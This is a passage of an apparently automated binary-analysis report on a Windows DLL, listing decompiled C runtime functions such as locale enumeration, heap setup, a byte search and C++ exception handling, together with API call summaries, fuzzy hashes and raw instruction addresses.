                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • EnumSystemLocalesW.KERNEL32(6DA9C614,00000001,?,?,-00000050,?,6DA9C9B6,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 6DA9C380
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: e456c7c3ae31223ac98eef1bdcdfd39b6a95bb2c89f53cb177e2f511999e8a69
              • Instruction ID: 746895d8047ebc5defd9cda70448bfc39b3495009cf142adabd77cbaab16f216
              • Opcode Fuzzy Hash: e456c7c3ae31223ac98eef1bdcdfd39b6a95bb2c89f53cb177e2f511999e8a69
              • Instruction Fuzzy Hash: 2CF0F67A21C7056FDB145F35C880A7BBBE5EF81368F0A852CFA458F680C7799882C750
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 83%
              			E6DA96349(void* __ebx, void* __edi, void* __esi, void* __eflags) {
              				intOrPtr _t17;
              				signed int _t29;
              				void* _t31;
              
              				_push(0xc);
              				_push(0x6dab14e0);
              				E6DA89CA0(__ebx, __edi, __esi);
              				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
              				E6DA8FB12( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
              				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
              				 *0x6dad5b38 = E6DA91CA7( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
              				_t29 = EnumSystemLocalesW(E6DA9633C, 1);
              				_t17 =  *0x6dab3014; // 0x6c4e8ceb
              				 *0x6dad5b38 = _t17;
              				 *(_t31 - 0x1c) = _t29;
              				 *(_t31 - 4) = 0xfffffffe;
              				E6DA963B9();
              				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
              				return _t29;
              			}







              APIs
                • Part of subcall function 6DA8FB12: RtlEnterCriticalSection.NTDLL(?), ref: 6DA8FB21
              • EnumSystemLocalesW.KERNEL32(6DA9633C,00000001,6DAB14E0,0000000C,6DA9670E,00000000), ref: 6DA96381
              Similarity
              • API ID: CriticalEnterEnumLocalesSectionSystem
              • String ID:
              • API String ID: 1272433827-0
              • Opcode ID: 8441ed519a422d6470bf2309ce48257087366940abf78c252d66a52ece89729b
              • Instruction ID: a58b87a5eab4b5158191941b8d8e8ad5943d773a0514586462bfc7f1f4e2fbe1
              • Opcode Fuzzy Hash: 8441ed519a422d6470bf2309ce48257087366940abf78c252d66a52ece89729b
              • Instruction Fuzzy Hash: 59F037B2A18200DFEB00CFA8D540BAD77F0EB4A324F10811AE6109B290DB7649818B91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA9C250(void* __ecx, void* __edx, signed char* _a4) {
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t9;
              				signed char* _t13;
              				intOrPtr* _t15;
              				void* _t19;
              				void* _t21;
              				void* _t22;
              
              				_t19 = E6DA92BDC(__ecx, __edx, _t21);
              				_t15 =  *((intOrPtr*)(_t19 + 0x54));
              				_t22 = _t15 + 2;
              				do {
              					_t9 =  *_t15;
              					_t15 = _t15 + 2;
              				} while (_t9 != 0);
              				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
              				EnumSystemLocalesW(E6DA9C1A9, 1);
              				_t13 = _a4;
              				if(( *_t13 & 0x00000004) == 0) {
              					 *_t13 = 0;
              					return _t13;
              				}
              				return _t13;
              			}












              APIs
                • Part of subcall function 6DA92BDC: GetLastError.KERNEL32(?,00000008,6DA98ED9), ref: 6DA92BE0
                • Part of subcall function 6DA92BDC: SetLastError.KERNEL32(00000000,?,00000005,000000FF), ref: 6DA92C82
              • EnumSystemLocalesW.KERNEL32(6DA9C1A9,00000001,?,?,?,6DA9CA14,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6DA9C287
              Similarity
              • API ID: ErrorLast$EnumLocalesSystem
              • String ID:
              • API String ID: 2417226690-0
              • Opcode ID: 60e8bb2cd47bcd544bbf14e000117d50f303843ccc68cbdf0b04b8d7936e5dd7
              • Instruction ID: 18719b3a1d435db0bec737f8ef6d5d8ce466ceaa9c4ce4c82ae9835cbeab485a
              • Opcode Fuzzy Hash: 60e8bb2cd47bcd544bbf14e000117d50f303843ccc68cbdf0b04b8d7936e5dd7
              • Instruction Fuzzy Hash: 0DF0E53A3182069BDB04AF75D954A6A7FE4EFC1B24F0F4059EA098F680C67599C3C754
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,6DA94185,?,20001004,00000000,00000002,?,?,6DA93787), ref: 6DA96846
              Similarity
              • API ID: InfoLocale
              • String ID:
              • API String ID: 2299586839-0
              • Opcode ID: 9cf64e50fffb1dc24858935d0f50bb718feac82d587ffee6b793581cc4d86276
              • Instruction ID: 700642a75f917480584dc29d6ad7f0650d08c7ad9949064d08c3f8a2f6cffc0b
              • Opcode Fuzzy Hash: 9cf64e50fffb1dc24858935d0f50bb718feac82d587ffee6b793581cc4d86276
              • Instruction Fuzzy Hash: 73E04F35558229FBCF022FA0DC18F9E3FA9EF45750F09C024FD1469361CB728961AAD5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA9A32E() {
              				signed int _t3;
              
              				_t3 = GetProcessHeap();
              				 *0x6dad5c48 = _t3;
              				return _t3 & 0xffffff00 | _t3 != 0x00000000;
              			}





              APIs
              Similarity
              • API ID: HeapProcess
              • String ID:
              • API String ID: 54951025-0
              • Opcode ID: f2023d458d7db4d49e524ac91f84148b5ddc8eba2ca7d33e0705ede91e19132b
              • Instruction ID: 99495a3a2eb68628b4cd55c29ceeeb523bdeb37b29a0cf76d3ea108072deeb6c
              • Opcode Fuzzy Hash: f2023d458d7db4d49e524ac91f84148b5ddc8eba2ca7d33e0705ede91e19132b
              • Instruction Fuzzy Hash: 2DA0113030A3028BCBA08E38830830C3AB8AA0B280B288028A008C0080EF20A0828A00
              Uniqueness

              Uniqueness Score: -1.00%

              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c34f426b9a83df5c81076bf0e8f1d802ef1baa16c665cfed90a844d72875bc3a
              • Instruction ID: 36895f2eaaee776b5e8e31f4f394ae7578205e4533318056ed952f50620f5fc3
              • Opcode Fuzzy Hash: c34f426b9a83df5c81076bf0e8f1d802ef1baa16c665cfed90a844d72875bc3a
              • Instruction Fuzzy Hash: E532F522D7DF424DDB239534C83133AA798AFA73C4F19D727E819B9A99EB29C5C34140
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA8B200(signed int _a4, signed char _a8, intOrPtr _a12) {
              				intOrPtr _t13;
              				void* _t14;
              				signed char _t20;
              				signed char _t24;
              				signed int _t27;
              				signed char _t32;
              				unsigned int _t33;
              				signed char _t35;
              				signed char _t37;
              				signed int _t39;
              
              				_t13 = _a12;
              				if(_t13 == 0) {
              					L11:
              					return _t13;
              				} else {
              					_t39 = _a4;
              					_t20 = _a8;
              					if((_t39 & 0x00000003) == 0) {
              						L5:
              						_t14 = _t13 - 4;
              						if(_t14 < 0) {
              							L8:
              							_t13 = _t14 + 4;
              							if(_t13 == 0) {
              								goto L11;
              							} else {
              								while(1) {
              									_t24 =  *_t39;
              									_t39 = _t39 + 1;
              									if((_t24 ^ _t20) == 0) {
              										goto L20;
              									}
              									_t13 = _t13 - 1;
              									if(_t13 != 0) {
              										continue;
              									} else {
              										goto L11;
              									}
              									goto L24;
              								}
              								goto L20;
              							}
              						} else {
              							_t20 = ((_t20 << 8) + _t20 << 0x10) + (_t20 << 8) + _t20;
              							do {
              								_t27 =  *_t39 ^ _t20;
              								_t39 = _t39 + 4;
              								if(((_t27 ^ 0xffffffff ^ 0x7efefeff + _t27) & 0x81010100) == 0) {
              									goto L12;
              								} else {
              									_t32 =  *(_t39 - 4) ^ _t20;
              									if(_t32 == 0) {
              										_t12 = _t39 - 4; // -12
              										return _t12;
              									} else {
              										_t33 = _t32 ^ _t20;
              										if(_t33 == 0) {
              											_t11 = _t39 - 3; // -11
              											return _t11;
              										} else {
              											_t35 = _t33 >> 0x00000010 ^ _t20;
              											if(_t35 == 0) {
              												_t10 = _t39 - 2; // -10
              												return _t10;
              											} else {
              												if((_t35 ^ _t20) == 0) {
              													goto L20;
              												} else {
              													goto L12;
              												}
              											}
              										}
              									}
              								}
              								goto L24;
              								L12:
              								_t14 = _t14 - 4;
              							} while (_t14 >= 0);
              							goto L8;
              						}
              					} else {
              						while(1) {
              							_t37 =  *_t39;
              							_t39 = _t39 + 1;
              							if((_t37 ^ _t20) == 0) {
              								break;
              							}
              							_t13 = _t13 - 1;
              							if(_t13 == 0) {
              								goto L11;
              							} else {
              								if((_t39 & 0x00000003) != 0) {
              									continue;
              								} else {
              									goto L5;
              								}
              							}
              							goto L24;
              						}
              						L20:
              						_t9 = _t39 - 1; // -9
              						return _t9;
              					}
              				}
              				L24:
              			}













              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
              • Instruction ID: 6af97e463d43c3e9e4c92b6e9292d60c92e50216347e79e044ddd874f0d70bab
              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
              • Instruction Fuzzy Hash: 8E11297B24814387D340C96DC8B47BFE795FAC6225B2C4365D8754BA56F123A0C19502
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA99229(void* __ecx) {
              				char _v8;
              				intOrPtr _t7;
              				char _t13;
              
              				_t13 = 0;
              				_v8 = 0;
              				_t7 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
              				_t16 =  *((intOrPtr*)(_t7 + 8));
              				if( *((intOrPtr*)(_t7 + 8)) < 0) {
              					L2:
              					_t13 = 1;
              				} else {
              					E6DA96660(_t16,  &_v8);
              					if(_v8 != 1) {
              						goto L2;
              					}
              				}
              				return _t13;
              			}






              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 311848273280192d40b1ad7f5b0b063147d93dba66c321036d0fe31074e24a83
              • Instruction ID: 8193f4c6d02980ed11aa4bc0972faf0c17fac94b7b09d7a6a9149804112d610f
              • Opcode Fuzzy Hash: 311848273280192d40b1ad7f5b0b063147d93dba66c321036d0fe31074e24a83
              • Instruction Fuzzy Hash: 3EE08C32929228EBCB14CB98CA04E8AB3ECEB84B50F1504A6F605D7200C270DE40CBC1
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6DA91610(void* __ecx, void* __eflags) {
              
              				if(E6DA99229(__ecx) == 1 || ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) != 0) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}



              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a50bd0236d097da5bf19158a0a6e12620a5b0abaf9b60c89cfa537db934b0c82
              • Instruction ID: 93778f8babb8e045a1aa603f74e81501b8f2865ad1f5038fd95ca28b557c45fc
              • Opcode Fuzzy Hash: a50bd0236d097da5bf19158a0a6e12620a5b0abaf9b60c89cfa537db934b0c82
              • Instruction Fuzzy Hash: 66C0803CC1C50046DE055614937037473DBA381782F483CCCC6024F641C51D58C1D601
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 73%
              			E6DA8C7DF(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
              				signed char* _v0;
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				intOrPtr _v24;
              				char _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				signed int _v44;
              				intOrPtr _v48;
              				signed int _v52;
              				intOrPtr _v56;
              				intOrPtr _v60;
              				void _v64;
              				signed int _v68;
              				char _v84;
              				intOrPtr _v88;
              				signed int _v92;
              				intOrPtr _v100;
              				void _v104;
              				intOrPtr* _v112;
              				signed char* _v184;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				void* _t202;
              				signed int _t203;
              				char _t204;
              				signed int _t206;
              				signed int _t208;
              				signed char* _t209;
              				signed int _t210;
              				signed int _t211;
              				signed int _t215;
              				void* _t218;
              				signed char* _t221;
              				void* _t223;
              				void* _t225;
              				signed char _t229;
              				signed int _t230;
              				void* _t232;
              				void* _t235;
              				void* _t238;
              				signed char _t245;
              				signed int _t250;
              				void* _t253;
              				signed int* _t255;
              				signed int _t256;
              				intOrPtr _t257;
              				signed int _t258;
              				void* _t263;
              				void* _t268;
              				void* _t269;
              				signed int _t273;
              				signed char* _t274;
              				intOrPtr* _t275;
              				signed char _t276;
              				signed int _t277;
              				signed int _t278;
              				intOrPtr* _t280;
              				signed int _t281;
              				signed int _t282;
              				signed int _t287;
              				signed int _t294;
              				signed int _t295;
              				signed int _t298;
              				signed int _t300;
              				signed char* _t301;
              				signed int _t302;
              				signed int _t303;
              				signed int* _t305;
              				signed char* _t308;
              				signed int _t318;
              				signed int _t319;
              				signed int _t321;
              				signed int _t330;
              				void* _t332;
              				void* _t334;
              				void* _t335;
              				void* _t336;
              				void* _t337;
              
              				_t300 = __edx;
              				_push(_t319);
              				_t305 = _a20;
              				_v20 = 0;
              				_v28 = 0;
              				_t279 = E6DA8D748(_a8, _a16, _t305);
              				_t335 = _t334 + 0xc;
              				_v12 = _t279;
              				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
              					L66:
              					_t202 = E6DA90BF9(_t274, _t279, _t300, _t305, _t319);
              					asm("int3");
              					_t332 = _t335;
              					_t336 = _t335 - 0x38;
              					_push(_t274);
              					_t275 = _v112;
              					__eflags =  *_t275 - 0x80000003;
              					if( *_t275 == 0x80000003) {
              						return _t202;
              					} else {
              						_t203 = E6DA8C463(_t275, _t279, _t300, _t305, _t319, _t305, _t319);
              						__eflags =  *(_t203 + 8);
              						if( *(_t203 + 8) != 0) {
              							__imp__EncodePointer(0);
              							_t319 = _t203;
              							_t223 = E6DA8C463(_t275, _t279, _t300, 0, _t319);
              							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
              							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
              								__eflags =  *_t275 - 0xe0434f4d;
              								if( *_t275 != 0xe0434f4d) {
              									__eflags =  *_t275 - 0xe0434352;
              									if( *_t275 != 0xe0434352) {
              										_t215 = E6DA8A418(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
              										_t336 = _t336 + 0x1c;
              										__eflags = _t215;
              										if(_t215 != 0) {
              											L83:
              											return _t215;
              										}
              									}
              								}
              							}
              						}
              						_t204 = _a16;
              						_v28 = _t204;
              						_v24 = 0;
              						__eflags =  *(_t204 + 0xc);
              						if( *(_t204 + 0xc) > 0) {
              							_push(_a24);
              							E6DA8A34B(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
              							_t302 = _v40;
              							_t337 = _t336 + 0x18;
              							_t215 = _v44;
              							_v20 = _t215;
              							_v12 = _t302;
              							__eflags = _t302 - _v32;
              							if(_t302 >= _v32) {
              								goto L83;
              							}
              							_t281 = _t302 * 0x14;
              							__eflags = _t281;
              							_v16 = _t281;
              							do {
              								_t282 = 5;
              								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
              								_t337 = _t337 + 0xc;
              								__eflags = _v64 - _t218;
              								if(_v64 > _t218) {
              									goto L82;
              								}
              								__eflags = _t218 - _v60;
              								if(_t218 > _v60) {
              									goto L82;
              								}
              								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
              								_t287 = _t221[4];
              								__eflags = _t287;
              								if(_t287 == 0) {
              									L80:
              									__eflags =  *_t221 & 0x00000040;
              									if(( *_t221 & 0x00000040) == 0) {
              										_push(0);
              										_push(1);
              										E6DA8C75F(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
              										_t302 = _v12;
              										_t337 = _t337 + 0x30;
              									}
              									goto L82;
              								}
              								__eflags =  *((char*)(_t287 + 8));
              								if( *((char*)(_t287 + 8)) != 0) {
              									goto L82;
              								}
              								goto L80;
              								L82:
              								_t302 = _t302 + 1;
              								_t215 = _v20;
              								_t281 = _v16 + 0x14;
              								_v12 = _t302;
              								_v16 = _t281;
              								__eflags = _t302 - _v32;
              							} while (_t302 < _v32);
              							goto L83;
              						}
              						E6DA90BF9(_t275, _t279, _t300, 0, _t319);
              						asm("int3");
              						_push(_t332);
              						_t301 = _v184;
              						_push(_t275);
              						_push(_t319);
              						_push(0);
              						_t206 = _t301[4];
              						__eflags = _t206;
              						if(_t206 == 0) {
              							L108:
              							_t208 = 1;
              							__eflags = 1;
              						} else {
              							_t280 = _t206 + 8;
              							__eflags =  *_t280;
              							if( *_t280 == 0) {
              								goto L108;
              							} else {
              								__eflags =  *_t301 & 0x00000080;
              								_t308 = _v0;
              								if(( *_t301 & 0x00000080) == 0) {
              									L90:
              									_t276 = _t308[4];
              									_t321 = 0;
              									__eflags = _t206 - _t276;
              									if(_t206 == _t276) {
              										L100:
              										__eflags =  *_t308 & 0x00000002;
              										if(( *_t308 & 0x00000002) == 0) {
              											L102:
              											_t209 = _a4;
              											__eflags =  *_t209 & 0x00000001;
              											if(( *_t209 & 0x00000001) == 0) {
              												L104:
              												__eflags =  *_t209 & 0x00000002;
              												if(( *_t209 & 0x00000002) == 0) {
              													L106:
              													_t321 = 1;
              													__eflags = 1;
              												} else {
              													__eflags =  *_t301 & 0x00000002;
              													if(( *_t301 & 0x00000002) != 0) {
              														goto L106;
              													}
              												}
              											} else {
              												__eflags =  *_t301 & 0x00000001;
              												if(( *_t301 & 0x00000001) != 0) {
              													goto L104;
              												}
              											}
              										} else {
              											__eflags =  *_t301 & 0x00000008;
              											if(( *_t301 & 0x00000008) != 0) {
              												goto L102;
              											}
              										}
              										_t208 = _t321;
              									} else {
              										_t185 = _t276 + 8; // 0x6e
              										_t210 = _t185;
              										while(1) {
              											_t277 =  *_t280;
              											__eflags = _t277 -  *_t210;
              											if(_t277 !=  *_t210) {
              												break;
              											}
              											__eflags = _t277;
              											if(_t277 == 0) {
              												L96:
              												_t211 = _t321;
              											} else {
              												_t278 =  *((intOrPtr*)(_t280 + 1));
              												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
              												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
              													break;
              												} else {
              													_t280 = _t280 + 2;
              													_t210 = _t210 + 2;
              													__eflags = _t278;
              													if(_t278 != 0) {
              														continue;
              													} else {
              														goto L96;
              													}
              												}
              											}
              											L98:
              											__eflags = _t211;
              											if(_t211 == 0) {
              												goto L100;
              											} else {
              												_t208 = 0;
              											}
              											goto L109;
              										}
              										asm("sbb eax, eax");
              										_t211 = _t210 | 0x00000001;
              										__eflags = _t211;
              										goto L98;
              									}
              								} else {
              									__eflags =  *_t308 & 0x00000010;
              									if(( *_t308 & 0x00000010) != 0) {
              										goto L108;
              									} else {
              										goto L90;
              									}
              								}
              							}
              						}
              						L109:
              						return _t208;
              					}
              				} else {
              					_t274 = _a4;
              					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
              						L22:
              						_t300 = _a12;
              						_v8 = _t300;
              						goto L24;
              					} else {
              						_t319 = 0;
              						if(_t274[0x1c] != 0) {
              							goto L22;
              						} else {
              							_t225 = E6DA8C463(_t274, _t279, _t300, _t305, 0);
              							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
              								L60:
              								return _t225;
              							} else {
              								_t274 =  *(E6DA8C463(_t274, _t279, _t300, _t305, 0) + 0x10);
              								_t263 = E6DA8C463(_t274, _t279, _t300, _t305, 0);
              								_v28 = 1;
              								_v8 =  *((intOrPtr*)(_t263 + 0x14));
              								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
              									goto L66;
              								} else {
              									if( *((intOrPtr*)(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
              										L23:
              										_t300 = _v8;
              										_t279 = _v12;
              										L24:
              										_v52 = _t305;
              										_v48 = 0;
              										__eflags =  *_t274 - 0xe06d7363;
              										if( *_t274 != 0xe06d7363) {
              											L56:
              											__eflags = _t305[3];
              											if(_t305[3] <= 0) {
              												goto L59;
              											} else {
              												__eflags = _a24;
              												if(_a24 != 0) {
              													goto L66;
              												} else {
              													_push(_a32);
              													_push(_a28);
              													_push(_t279);
              													_push(_t305);
              													_push(_a16);
              													_push(_t300);
              													_push(_a8);
              													_push(_t274);
              													L67();
              													_t335 = _t335 + 0x20;
              													goto L59;
              												}
              											}
              										} else {
              											__eflags = _t274[0x10] - 3;
              											if(_t274[0x10] != 3) {
              												goto L56;
              											} else {
              												__eflags = _t274[0x14] - 0x19930520;
              												if(_t274[0x14] == 0x19930520) {
              													L29:
              													_t319 = _a32;
              													__eflags = _t305[3];
              													if(_t305[3] > 0) {
              														_push(_a28);
              														E6DA8A34B(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
              														_t300 = _v64;
              														_t335 = _t335 + 0x18;
              														_t250 = _v68;
              														_v44 = _t250;
              														_v16 = _t300;
              														__eflags = _t300 - _v56;
              														if(_t300 < _v56) {
              															_t294 = _t300 * 0x14;
              															__eflags = _t294;
              															_v32 = _t294;
              															do {
              																_t295 = 5;
              																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
              																_t335 = _t335 + 0xc;
              																__eflags = _v104 - _t253;
              																if(_v104 <= _t253) {
              																	__eflags = _t253 - _v100;
              																	if(_t253 <= _v100) {
              																		_t298 = 0;
              																		_v20 = 0;
              																		__eflags = _v92;
              																		if(_v92 != 0) {
              																			_t255 =  *(_t274[0x1c] + 0xc);
              																			_t303 =  *_t255;
              																			_t256 =  &(_t255[1]);
              																			__eflags = _t256;
              																			_v36 = _t256;
              																			_t257 = _v88;
              																			_v40 = _t303;
              																			_v24 = _t257;
              																			do {
              																				asm("movsd");
              																				asm("movsd");
              																				asm("movsd");
              																				asm("movsd");
              																				_t318 = _v36;
              																				_t330 = _t303;
              																				__eflags = _t330;
              																				if(_t330 <= 0) {
              																					goto L40;
              																				} else {
              																					while(1) {
              																						_push(_t274[0x1c]);
              																						_t258 =  &_v84;
              																						_push( *_t318);
              																						_push(_t258);
              																						L86();
              																						_t335 = _t335 + 0xc;
              																						__eflags = _t258;
              																						if(_t258 != 0) {
              																							break;
              																						}
              																						_t330 = _t330 - 1;
              																						_t318 = _t318 + 4;
              																						__eflags = _t330;
              																						if(_t330 > 0) {
              																							continue;
              																						} else {
              																							_t298 = _v20;
              																							_t257 = _v24;
              																							_t303 = _v40;
              																							goto L40;
              																						}
              																						goto L43;
              																					}
              																					_push(_a24);
              																					_push(_v28);
              																					E6DA8C75F(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
              																					_t335 = _t335 + 0x30;
              																				}
              																				L43:
              																				_t300 = _v16;
              																				goto L44;
              																				L40:
              																				_t298 = _t298 + 1;
              																				_t257 = _t257 + 0x10;
              																				_v20 = _t298;
              																				_v24 = _t257;
              																				__eflags = _t298 - _v92;
              																			} while (_t298 != _v92);
              																			goto L43;
              																		}
              																	}
              																}
              																L44:
              																_t300 = _t300 + 1;
              																_t250 = _v44;
              																_t294 = _v32 + 0x14;
              																_v16 = _t300;
              																_v32 = _t294;
              																__eflags = _t300 - _v56;
              															} while (_t300 < _v56);
              															_t305 = _a20;
              															_t319 = _a32;
              														}
              													}
              													__eflags = _a24;
              													if(__eflags != 0) {
              														_push(1);
              														E6DA8A783(_t274, _t305, _t319, __eflags);
              														_t279 = _t274;
              													}
              													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
              													if(( *_t305 & 0x1fffffff) < 0x19930521) {
              														L59:
              														_t225 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
              														__eflags =  *(_t225 + 0x1c);
              														if( *(_t225 + 0x1c) != 0) {
              															goto L66;
              														} else {
              															goto L60;
              														}
              													} else {
              														__eflags = _t305[7];
              														if(_t305[7] != 0) {
              															L52:
              															_t229 = _t305[8] >> 2;
              															__eflags = _t229 & 0x00000001;
              															if((_t229 & 0x00000001) == 0) {
              																_push(_t305[7]);
              																_t230 = E6DA8D1EE(_t274, _t305, _t319, _t274);
              																_pop(_t279);
              																__eflags = _t230;
              																if(_t230 == 0) {
              																	goto L63;
              																} else {
              																	goto L59;
              																}
              															} else {
              																 *(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
              																_t238 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
              																_t290 = _v8;
              																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
              																goto L61;
              															}
              														} else {
              															_t245 = _t305[8] >> 2;
              															__eflags = _t245 & 0x00000001;
              															if((_t245 & 0x00000001) == 0) {
              																goto L59;
              															} else {
              																__eflags = _a28;
              																if(_a28 != 0) {
              																	goto L59;
              																} else {
              																	goto L52;
              																}
              															}
              														}
              													}
              												} else {
              													__eflags = _t274[0x14] - 0x19930521;
              													if(_t274[0x14] == 0x19930521) {
              														goto L29;
              													} else {
              														__eflags = _t274[0x14] - 0x19930522;
              														if(_t274[0x14] != 0x19930522) {
              															goto L56;
              														} else {
              															goto L29;
              														}
              													}
              												}
              											}
              										}
              									} else {
              										_v16 =  *((intOrPtr*)(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x1c));
              										_t268 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
              										_push(_v16);
              										 *(_t268 + 0x1c) = _t319;
              										_t269 = E6DA8D1EE(_t274, _t305, _t319, _t274);
              										_pop(_t290);
              										if(_t269 != 0) {
              											goto L23;
              										} else {
              											_t305 = _v16;
              											_t356 =  *_t305 - _t319;
              											if( *_t305 <= _t319) {
              												L61:
              												E6DA9122B(_t274, _t290, _t300, _t305, _t319, __eflags);
              											} else {
              												while(1) {
              													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
              													if(E6DA8CE82( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6dad4b28) != 0) {
              														goto L62;
              													}
              													_t319 = _t319 + 0x10;
              													_t273 = _v20 + 1;
              													_v20 = _t273;
              													_t356 = _t273 -  *_t305;
              													if(_t273 >=  *_t305) {
              														goto L61;
              													} else {
              														continue;
              													}
              													goto L62;
              												}
              											}
              											L62:
              											_push(1);
              											_push(_t274);
              											E6DA8A783(_t274, _t305, _t319, __eflags);
              											_t279 =  &_v64;
              											E6DA8CE6A( &_v64);
              											E6DA8AA9D( &_v64, 0x6dab121c);
              											L63:
              											 *(E6DA8C463(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
              											_t232 = E6DA8C463(_t274, _t279, _t300, _t305, _t319);
              											_t279 = _v8;
              											 *(_t232 + 0x14) = _v8;
              											__eflags = _t319;
              											if(_t319 == 0) {
              												_t319 = _a8;
              											}
              											E6DA8A53E(_t279, _t319, _t274);
              											E6DA8D0EE(_a8, _a16, _t305);
              											_t235 = E6DA8D2AB(_t305);
              											_t335 = _t335 + 0x10;
              											_push(_t235);
              											E6DA8D065(_t274, _t279, _t300, _t305, _t319, __eflags);
              											goto L66;
              										}
              									}
              								}
              							}
              						}
              					}
              				}
              			}
              0x6da8c9b9
              0x6da8c9bb
              0x6da8c9be
              0x6da8c9c4
              0x6da8c9c7
              0x6da8c9cd
              0x6da8c9cf
              0x6da8c9d2
              0x6da8c9d5
              0x6da8c9de
              0x6da8c9e1
              0x6da8c9e3
              0x6da8c9e3
              0x6da8c9e6
              0x6da8c9e9
              0x6da8c9ec
              0x6da8c9ef
              0x6da8c9f2
              0x6da8c9f7
              0x6da8c9f8
              0x6da8c9f9
              0x6da8c9fa
              0x6da8c9fb
              0x6da8c9fe
              0x6da8ca00
              0x6da8ca02
              0x00000000
              0x6da8ca04
              0x6da8ca04
              0x6da8ca04
              0x6da8ca07
              0x6da8ca0a
              0x6da8ca0c
              0x6da8ca0d
              0x6da8ca12
              0x6da8ca15
              0x6da8ca17
              0x00000000
              0x00000000
              0x6da8ca19
              0x6da8ca1a
              0x6da8ca1d
              0x6da8ca1f
              0x00000000
              0x6da8ca21
              0x6da8ca21
              0x6da8ca24
              0x6da8ca27
              0x00000000
              0x6da8ca27
              0x00000000
              0x6da8ca1f
              0x6da8ca3b
              0x6da8ca41
              0x6da8ca5e
              0x6da8ca63
              0x6da8ca63
              0x6da8ca66
              0x6da8ca66
              0x00000000
              0x6da8ca2a
              0x6da8ca2a
              0x6da8ca2b
              0x6da8ca2e
              0x6da8ca31
              0x6da8ca34
              0x6da8ca34
              0x00000000
              0x6da8ca39
              0x6da8c9d5
              0x6da8c9c7
              0x6da8ca69
              0x6da8ca6c
              0x6da8ca6d
              0x6da8ca70
              0x6da8ca73
              0x6da8ca76
              0x6da8ca79
              0x6da8ca79
              0x6da8ca82
              0x6da8ca85
              0x6da8ca85
              0x6da8c99d
              0x6da8ca88
              0x6da8ca8c
              0x6da8ca8e
              0x6da8ca91
              0x6da8ca97
              0x6da8ca97
              0x6da8ca9f
              0x6da8caa4
              0x6da8cb12
              0x6da8cb12
              0x6da8cb17
              0x6da8cb1b
